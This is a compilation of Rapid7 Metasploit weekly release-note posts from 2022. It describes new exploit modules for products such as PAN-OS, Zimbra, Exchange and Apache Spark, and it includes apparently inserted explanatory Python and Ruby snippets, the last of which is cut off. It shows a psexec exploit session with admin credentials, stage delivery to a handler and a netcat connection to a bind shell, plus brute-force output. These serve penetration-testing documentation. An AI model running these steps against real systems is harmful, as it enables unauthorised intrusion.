We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.

Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the shellcode_file option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.
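As an added illustration of the framing described above (example code written here, not code from the Metasploit project), this small Python parser is what an analyst could run over the first bytes of a captured listener-to-stager stream, alongside the matching framing function. It assumes a 4-byte unsigned little-endian size prefix immediately followed by the stage bytes; the page only says the size is prepended, so the width and byte order are assumptions.

```python
import struct

# Assumed framing (the page says only "prepend the shellcode size"):
# 4-byte unsigned little-endian length, immediately followed by the stage.
HEADER_LEN = 4
# Reject absurd declared lengths before anyone allocates for them.
MAX_SANE_STAGE = 16 * 1024 * 1024


def frame_stage(stage: bytes) -> bytes:
    """Build the on-wire frame the page describes: size prefix, then the bytes."""
    if not stage:
        raise ValueError("empty stage")
    if len(stage) > MAX_SANE_STAGE:
        raise ValueError("stage too large for the assumed 4-byte framing policy")
    return struct.pack("<I", len(stage)) + stage


def parse_stage_frame(stream: bytes) -> dict:
    """Inspect the leading bytes a listener sent to a connecting stager.

    Returns a dict with:
      status   - "no_header", "implausible_length", "truncated",
                 "complete" or "trailing_data"
      declared - length the header claims (None if no header)
      received - number of body bytes that actually arrived
      stage    - the stage bytes, only when the frame is complete
    A captured stream that is "truncated" or "implausible_length" is not
    consistent with a successful custom-stage delivery; "complete" with a
    declared length matching the body is.
    """
    if len(stream) < HEADER_LEN:
        return {"status": "no_header", "declared": None,
                "received": len(stream), "stage": None}

    (declared,) = struct.unpack_from("<I", stream, 0)
    body = stream[HEADER_LEN:]

    if declared == 0 or declared > MAX_SANE_STAGE:
        return {"status": "implausible_length", "declared": declared,
                "received": len(body), "stage": None}
    if len(body) < declared:
        return {"status": "truncated", "declared": declared,
                "received": len(body), "stage": None}

    status = "trailing_data" if len(body) > declared else "complete"
    return {"status": status, "declared": declared,
            "received": len(body), "stage": body[:declared]}


# Constructed filler standing in for a 505-byte stage (the size shown in the
# console output on this page). It is deterministic bytes, not real code.
SAMPLE_STAGE = bytes((i * 7) % 256 for i in range(505))


if __name__ == "__main__":
    wire = frame_stage(SAMPLE_STAGE)
    print(parse_stage_frame(wire)["status"], len(wire))        # complete 509
    print(parse_stage_frame(wire[:100])["status"])             # truncated
    print(parse_stage_frame(b"\x01\x02")["status"])            # no_header
```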

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
                                                    ng-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
                                                    /write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/x64/custom/reverse_tcp):

   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   EXITFUNC        thread                   yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           10.5.135.101             yes       The listen address (an interface may be specified)
   LPORT           4567                     yes       The listen port
   SHELLCODE_FILE  x64_shell_bind_4444.bin  no        Shellcode bin to launch


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] 10.5.132.159:445 - Connecting to the server...

<hacking intensifies>

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500


[*] 10.5.132.159 - Custom session 1 closed.  Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit

Now, we can just open a netcat session to the independent bind shell we started on the target:



[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
   IPv4 Address. . . . . . . . . . . : 10.5.132.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

Module added to exploit OS Command Injection in PAN-OS

Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits an OS Command Injection vulnerability CVE-2020-2038 in PAN-OS. This exploit affects versions of PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS runs one of the leading enterprise firewalls, Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database ranks the severity of this exploit as a high 7.2, as administrators of the system are able to execute arbitrary commands with root privileges. This is due to the API not employing sufficient filtering of input for its "op" request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on PT Swarm.

New module content (4)

  • SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 – This adds support for EIP-0f5d2d7f, a vulnerability in the uid parameter of the index.php?entryPoint=export page on SuiteCRM 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes of SuiteCRM users, which can then be cracked offline to gain access to SuiteCRM.

  • Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 – This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and versions 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.

  • #16521 from bwatters-r7 – This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.

  • #16906 from bcoles – This improves the post/windows/gather/enum_snmp module with shell and PowerShell session support, and fixes issues that low-privileged sessions would run into while reading the registry.

Enhancements and features (5)

  • #16911 from bcoles – This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the post/windows/gather/enum_ms_product_keys module.
  • #16929 from bcoles – The post/windows/gather/enum_services module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
  • #16930 from bcoles – This updates the scripts/resource/dev_checks.rc resource script to fix issues and add additional module checks.
  • #16953 from bcoles – The enum_domain script has been updated to support PowerShell and shell sessions, and its documentation and code have been cleaned up.
  • #17008 from EmilioPanti – rpc_core.rb has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn’t being reported, whilst other statistics like the number of exploit modules, auxiliary modules, and payloads were.

Bugs fixed (5)

  • #16928 from bcoles – Multiple bugs have been fixed in the Msf::Post::Windows::Service mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
  • #16998 from adfoster-r7 – Fixes a crash in modules using the IAX2 client.
  • #17013 from zeroSteiner – This PR enhances exploit/multi/http/jenkins_script_console to handle changes to the login process for Jenkins newer than version 2.246.
  • #17014 from adfoster-r7 – This fixes the exploit/multi/php/ignition_laravel_debug_rce module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
  • #17018 from adfoster-r7 – This fixes the route add command to use a sensible default netmask.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Navya Harika Karaka original https://blog.rapid7.com/2022/09/09/metasploit-weekly-wrap-up-175/

Authenticated command injection vulnerability of Cisco ASA-X with FirePOWER Services


jbaines-r7 (https://github.com/jbaines-r7) added a new module that exploits an authenticated command injection vulnerability, CVE-2022-20828, in Cisco ASA-X with FirePOWER Services. This vulnerability affects all Cisco ASA appliances that support the ASA FirePOWER module. Note that, although a patch has been added to the most recent ASA FirePOWER module versions such as 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21, some versions such as 6.2.2 and earlier, 6.3, 6.5, and 6.7 will not receive the patch. This exploit could allow the attacker to get root access and pivot to the inside network as well as the outside network. The exploit takes advantage of the FirePOWER Services SFR module’s Linux virtual machine via ASA’s ASDM web server, which also runs Snort on the traffic; therefore, an attacker can have access to the diverted traffic as well. Check out the video (https://www.youtube.com/watch?v=_4FEU4GDtB8) of the exploit for more information!

Remote code execution vulnerability of Apache Spark

KostyaKortchinsky and h00die-gr3y (https://github.com/h00die-gr3y) introduced a new module that exploits a remote code execution vulnerability, CVE-2022-33891, in Apache Spark. This exploit affects several Apache Spark versions: 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1. Apache Spark allows its users to enable Access Control Lists (ACLs) via the configuration option spark.acls.enable. This was introduced to improve access control within Apache Spark applications, but the code that’s triggered by this configuration option leads to a shell command injection vulnerability. Check out this post by HuskyHacks (https://github.com/HuskyHacks), who provided more information along with great examples!

New module content (2)

Enhancements and features (7)

  • #16901 from bcoles – The post/windows/manage/killav.rb script has been updated to support shell and PowerShell sessions and has undergone some code cleanup. Additionally, documentation has now been created to explain its operations and how to use it.
  • #16934 from bcoles – This adds support for dumping process memory by name in the post/windows/gather/memory_dump module.
  • #16947 from ILightThings – This adds support for formatting buffers for golang.
  • #16948 from gwillcox-r7 – This adds arguments for specifying the username, password and database to the #run_sql post method.
  • #16952 from bcoles – This PR improves the domain_controller? method to allow lower-priv users to invoke it, extends it to support shell sessions, and adds additional useful domain controller enumeration methods to the library.
  • #16973 from HuskyHacks – This adds support for formatting buffers for Nim.
  • #16983 from bcoles – This PR adds documentation, references and a more complete description for the firefox_xpi_bootstrapped_addon module.

Bugs fixed (5)

  • #16861 from adfoster-r7 – Fixes a bug in cmd/unix/reverse_ssh that stopped reverse SSH sessions from opening.
  • #16926 from jmartin-r7 – Fixes a bug when using RPC service with the analyze command and specifying a workspace, i.e. within Metasploit RPC client – rpc.call('db.analyze_host', { host: '<metasploitable3 ip>', workspace: 'other' } ).
  • #16968 from luisfso – This PR adds support for the new syntax of the find command’s perm parameter while also maintaining support for the deprecated syntax.
  • #16972 from cgranleese-r7 – Updates msfconsole’s tables to support word wrapping when colors are present.
  • #16974 from jbaines-r7 – Updates Rex::Proto::Http::Client to rely on Ruby’s built in string comparison.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/

ICPR Certificate Management


This week Metasploit has a new ICPR Certificate Management module from Oliver Lyak and our very own Spencer McIntyre, which can be utilized for issuing certificates via Active Directory Certificate Services. The capability to issue certificates is useful in a few contexts, including persistence, ESC1, and as a primitive necessary for exploiting CVE-2022-26923. The resulting PFX certificate file is stored to loot and is encrypted using a blank password.

ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum

Another addition, thanks to Erik Wynter and Sahil Dhar, brings two new auxiliary/gather modules and docs that take advantage of default Xnode credentials (CVE-2020-11532) in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at lib/msf/core/auxiliary/manageengine_xnode that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files that determine what data will be enumerated from Xnode. The PR contains even more information on the vulnerable systems and extensive notes!

New module content (5)

  • ICPR Certificate Management by Oliver Lyak and Spencer McIntyre – This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.

  • ManageEngine ADAudit Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a. CVE-2020-11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.

  • ManageEngine DataSecurity Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a. CVE-2020-11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.

  • Zyxel Firewall SUID Binary Privilege Escalation by jbaines-r7, which exploits CVE-2022-30526 – This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate to root. The vulnerability is identified as CVE-2022-30526 and is due to a SUID binary that allows any user to copy files with root permissions.

  • CVE-2022-30190 a.k.a. Follina by bwatters-r7 – This updates the exploit for CVE-2022-30190 (a.k.a. Follina) to support generating RTF exploit documents. RTF documents are helpful not only as another exploit vector, but because they trigger the payload execution when viewed in Explorer’s preview pane without requiring user interaction to enable editing.

Enhancements and features (4)

  • #16746 from adfoster-r7 – This updates the MSSQL login scanner to catch exceptions and continue running.

  • #16900 from bcoles – This adds a new #kill_process method that supports shell, PowerShell, and Meterpreter sessions on different platforms.

  • #16903 from bcoles – This cleans up the enum_shares post modules and adds support for shell sessions.

  • #16959 from adfoster-r7 – The time command has been updated with the --cpu and --memory profiler options to allow users to get memory and CPU usage profiles when running a command inside msfconsole.

Bugs fixed (5)

  • #16750 from bojanisc – This updates the exploit/multi/http/jenkins_script_console module to use the decoder from the java.util.Base64 class in place of the now-deprecated decoder from the sun.misc.BASE64Decoder class, enabling exploitation of newer Jenkins versions.

  • #16869 from bcoles – This fixes an issue in the file_remote_digestmd5() and file_remote_digestsha1() methods where read_file() would return an error message instead of the remote file contents. Additionally, the file_remote_digest* methods now support more session types, and they have a new util option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.

  • #16918 from rbowes-r7 – A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. This would lead to multiple sessions being returned when only one was desired.

  • #16920 from zeroSteiner – A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the --arch argument with msfvenom.

  • #16955 from gwillcox-r7 – This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

  • [Pull Requests 6.2.14...6.2.15][prs-landed]
  • [Full diff 6.2.14...6.2.15][diff]

If you are a git user, you can clone the [Metasploit Framework repo][repo] (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the
[binary installers][binary] (which also include the commercial edition).

[binary]: https://www.rapid7.com/products/metasploit/download.jsp
[diff]: https://github.com/rapid7/metasploit-framework/compare/6.2.14...6.2.15
[prs-landed]: https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"
[nightly]: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
[repo]: https://github.com/rapid7/metasploit-framework

Metasploit Wrap-Up

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/08/26/metasploit-wrap-up-173/

Zimbra Auth Bypass to Shell


Ron Bowes added an exploit module that targets multiple versions of Zimbra Collaboration Suite. The module leverages an authentication bypass (CVE-2022-37042) and a directory traversal vulnerability (CVE-2022-27925) to gain code execution as the zimbra user. The auth bypass functionality correctly checks for a valid session; however, the function that performs the check does not return and instead proceeds with execution. Because of this, an attacker only needs a valid account to get a shell. The directory traversal vulnerability lives in Zimbra’s Zip file extraction functionality, enabling an attacker to write an arbitrary file to a web directory. Coupling those two vulnerabilities together, the module writes a JSP shell to the target via a POST request to the /mboximport endpoint. These vulnerabilities have been reported as exploited in the wild.

Another Deserialization Flaw in Exchange

Our very own zeroSteiner submitted a new module that exploits an authenticated .Net deserialization vulnerability in Microsoft Exchange. The vulnerability is due to a flaw in the ChainedSerializationBinder, a type validator for serialized data. Provided the attacker has credentials for at least a low-privileged user, this exploit will result in code execution as NT AUTHORITY\SYSTEM.

New module content (2)

  • Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925) by Ron Bowes, Volexity Threat Research, and Yang_99’s Nest, which exploits CVE-2022-37042 – adds a module for CVE-2022-27925 and CVE-2022-37042. An attacker can exploit these issues to bypass authentication and then exploit a ZIP file path directory traversal vulnerability to gain RCE as the zimbra user.
  • #16915 from zeroSteiner – A new module has been added for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange prior to the March 8th 2022 security updates.

Enhancements and features (6)

  • #16701 from jbaines-r7 – This improves the original auxiliary/scanner/http/cisco_asa_asdm scanner module by adding the ability to brute force the Cisco ASA’s Clientless SSL VPN (webvpn) interface. The old module has been replaced by two new modules, this one and auxiliary/scanner/http/cisco_asa_asdm_bruteforce, which provide brute force of the Cisco ASA’s ASDM interface directly.
  • #16898 from bcoles – This adds a Msf::Post::Windows::Accounts.domain_controller? method and removes is_dc? methods from several modules in favor of using the new method.
  • #16899 from bcoles – This removes the domain_list_gen Meterpreter script which has been replaced by the post/windows/gather/enum_domain_group_users post module.
  • #16907 from bcoles – This improves the MS10-092 LPE exploit module. It uses the new task manager mixin, adds additional module metadata, and documentation.
  • #16912 from bcoles – This removes the sound recorder Meterpreter script. It has been replaced by the record_mic post module.
  • #16938 from zeroSteiner – The ldap_query module has been updated to allow the stored query templates to specify a Base DN prefix. Additionally, two ADCS-related queries have been added that use this to enumerate certificate authorities and certificate templates.

Bugs fixed (4)

  • #16925 from rbowes-r7 – This fixes some issues with the payload generation in the UnRAR generic exploit module (CVE-2022-30333). This also adds the option to provide its own custom payload.
  • #16931 from bcoles – A bug has been fixed in Rex::Post::Meterpreter::Extensions::Stdapi::AudioOutput.play_file where a channel would be opened before the path parameter was verified. This could lead to dangling channels being opened which would not be closed until Meterpreter was shut down.
  • #16935 from adfoster-r7 – Fixes multiple SSH warnings when loading msfconsole on Ubuntu 22.04 or the latest Kali version.
  • #16936 from adfoster-r7 – Fixes a crash when using evasion modules when mingw is not present on the host machine for generating encrypted payloads.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/08/19/metasploit-wrap-up-172/

Advantech iView NetworkServlet Command Injection


This week Shelby Pace has developed a new exploit module for CVE-2022-2143. This module uses an unauthenticated command injection vulnerability to gain remote code execution against vulnerable versions of Advantech iView software below 5.7.04.6469. The software runs as NT AUTHORITY\SYSTEM, granting the module user unauthenticated privileged access with relatively low effort. Version 5.7.04.6469 has been patched to require authentication, but remote code execution can still be achieved – gaining a shell as the LOCAL SERVICE user.

Cisco ASA ASDM Brute-force Login

Our very own Jake Baines has contributed a new module which scans for the Cisco ASA ASDM landing page and performs login brute-force to identify valid credentials:

msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
RHOST => 10.9.49.201
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
[*] Starting login brute force...
[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > 

New module content (2)

  • Cisco ASA ASDM Brute-force Login by jbaines-r7 – This adds a scanner module to brute force the Cisco ASA’s ASDM interface in its default configuration.
  • Advantech iView NetworkServlet Command Injection by Shelby Pace, rgod, and y4er, which exploits CVE-2022-2143 – This adds an exploit module that leverages a command injection vulnerability in Advantech iView (CVE-2022-2143) to get remote command execution as the SYSTEM user. Versions below 5.7.04.6469 are vulnerable and do not require authentication. Version 5.7.04.6469 is still vulnerable but requires valid credentials to be exploited. Also, this version only gets you RCE as the LOCAL SERVICE user.

Enhancements and features (7)

  • #16883 from gwillcox-r7 – This PR deprecates the srt_webdrive_priv script, as the same functionality is included in the service_permissions post module.
  • #16884 from bcoles – This PR deprecates the credcollect script, as it has effectively been replaced by post/windows/gather/credentials/credential_collector.
  • #16902 from bcoles – The scripts/meterpreter/killav.rb script has been removed, since scripts have been deprecated for over 5 years. It has been replaced with post/windows/manage/killav.
  • #16905 from bcoles – The scripts/meterpreter/panda_2007_pavsrv51.rb script has been removed and replaced by exploit/windows/local/service_permissions. Note that scripts have been deprecated for over 5 years and are no longer supported.
  • #16908 from bcoles – The scripts/meterpreter/dumplinks.rb script has been removed and replaced with post/windows/gather/dumplink, which does essentially the same thing but as a proper module rather than a deprecated script, since scripts stopped being supported several years ago.
  • #16909 from bcoles – The scripts/meterpreter/get_pidgin_creds.rb script has been removed, since scripts have been deprecated for some time now and are no longer supported. It has been replaced by post/multi/gather/pidgin_cred.
  • #16910 from bcoles – The scripts/meterpreter/arp_scanner.rb script has been replaced with post/windows/gather/arp_scanner which implements the same logic with an improved OUI database to help fingerprint the MAC vendor.

Bugs fixed (1)

  • #16881 from bcoles – This fixes a crash in the post/windows/manage/forward_pageant module caused by the removal of Dir::Tmpname.make_tmpname() in Ruby 2.5.0. This also makes some improvements to the code.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/08/05/metasploit-weekly-wrap-up-170/

Log4Shell in MobileIron Core


Thanks to jbaines-r7 we have yet another Log4Shell exploit. Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the tomcat user. Vulnerable versions of MobileIron Core have been reported as exploited in the wild.

VMware Workspace ONE Access LPE

Our very own Spencer McIntyre discovered and added a local privilege escalation module for CVE-2022-31660 in VMware Workspace ONE Access. By default, the horizon user has write permissions to the /opt/vmware/certproxy/bin/cert-proxy.sh script, and the sudo configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the /opt/vmware/certproxy/bin/cert-proxy.sh script and escalate their privileges to that of the root user by executing the certproxyService.sh with sudo. Because the horizon user runs the externally-facing web application in VMware Workspace ONE Access, CVE-2022-22954 can be leveraged for initial access to the target.

XML-RPC Unauthenticated RCE in Zoho Password Manager

Grant Willcox of the Metasploit team added a module that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the /xmlrpc endpoint will result in unauthenticated code execution as NT AUTHORITY\SYSTEM.

New module content (5)

  • Cisco PVC2300 POE Video Camera configuration download by Craig Heffner and Erik Wynter – This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.
  • BACnet Scanner by Paz – This adds a new scanner module that discovers BACnet devices on the network and extracts the model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local XML file.
  • MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits CVE-2021-44228 – This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.
  • VMware Workspace ONE Access CVE-2022-31660 by Spencer McIntyre, which exploits CVE-2022-31660 – This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.
  • Zoho Password Manager Pro XML-RPC Java Deserialization by Grant Willcox, Vinicius, and Y4er, which exploits CVE-2022-35405 – This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.

Enhancements and features (3)

  • #16833 from gwillcox-r7 – This PR adds an option to the host command to make it easier to delete host tags.
  • #16840 from bcoles – This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list and load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.
  • #16858 from adfoster-r7 – This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.

Bugs fixed (8)

  • #16820 from gwillcox-r7 – This PR fixes an issue in the ldap_query module where if the datastore option "action" wasn’t set the module would fail.
  • #16822 from adfoster-r7 – This fixes a bug in Rex::Ui::Text::Input::Buffer::BufferSock that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.
  • #16825 from rbowes-r7 – The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently.
  • #16832 from gwillcox-r7 – This fix removes an unnecessary echo statement from the ms10_092_schelevator module.
  • #16839 from bcoles – Fixes shell_registry_enumvals/getvaldata error checking.
  • #16844 from bcoles – This PR updates the post/multi/gather module to support non-meterpreter sessions like shell and powershell.
  • #16846 from jmartin-r7 – Updates auxiliary/scanner/ssh/ssh_login to gracefully handle Errno::EPIPE exceptions.
  • #16848 from jmartin-r7 – Fix a crash when updating session information in Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/07/29/metasploit-weekly-wrap-up-169/

Roxy-WI Unauthenticated RCE

This week, community member Nuri Çilengir added an unauthenticated RCE for Roxy-WI. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. The vulnerability can be triggered by a specially crafted POST request to a Python script where the ipbackend parameter is vulnerable to OS command injection. The result is reliable code execution within the context of the web application user.

Fewer Meterpreter Scripts

Community member bcoles removed multiple Meterpreter scripts which have been deprecated for years. Metasploit’s documentation has omitted details on how to write them since 2014 and removing the existing ones in favor of their new post-module equivalents ensures users are using the most up-to-date code and workflows. Post modules have a number of advantages over Meterpreter scripts and Metasploit has equivalents for each of the Meterpreter scripts that were removed.

Helpful Suggestions

Msfconsole will now suggest datastore option names when an invalid option is specified. This should help users understand when they make a mistake and misspell an option name. The original behavior would just set the invalid option which may leave the user confused when they think they set one thing but the option did not actually change.

For example, prior to these changes, setting LHSOT (instead of LHOST) would simply create a new option of that name, which had no effect on the module.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.169.1
LHSOT => 192.168.169.1

Now the new behavior will identify that LHSOT is not valid in the current context and will suggest setting LHOST instead.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.159.1
[-] Unknown datastore option: LHSOT. Did you mean LHOST?
msf6 exploit(windows/smb/psexec) >
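
The suggestion behaviour above is easy to reproduce outside the framework. The following is an added example, not Metasploit's own implementation: it validates a requested option name against a constructed option list (the names are assumed for illustration, not read from a real module) and, when the name is unknown, refuses the assignment and proposes the closest valid option by Levenshtein edit distance.

```ruby
# Added example (not Metasploit code): reject unknown datastore option names
# and suggest the closest valid one, mirroring "Did you mean LHOST?".

# Levenshtein edit distance, case-insensitive (classic O(a*b) dynamic program).
def edit_distance(a, b)
  a = a.downcase
  b = b.downcase
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cost = ca == cb ? 0 : 1
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost].min
    end
    prev = cur
  end
  prev.last
end

# Constructed option list; a real module's datastore would supply these names.
PSEXEC_OPTIONS = %w[RHOSTS RPORT SMBUser SMBPass SMBDomain LHOST LPORT SERVICE_NAME].freeze

# Returns the closest option name when it is within max_distance edits, else nil,
# so wildly wrong input does not get a misleading suggestion.
def suggest_option(name, options, max_distance: 2)
  best = options.min_by { |opt| edit_distance(name, opt) }
  return nil if best.nil?
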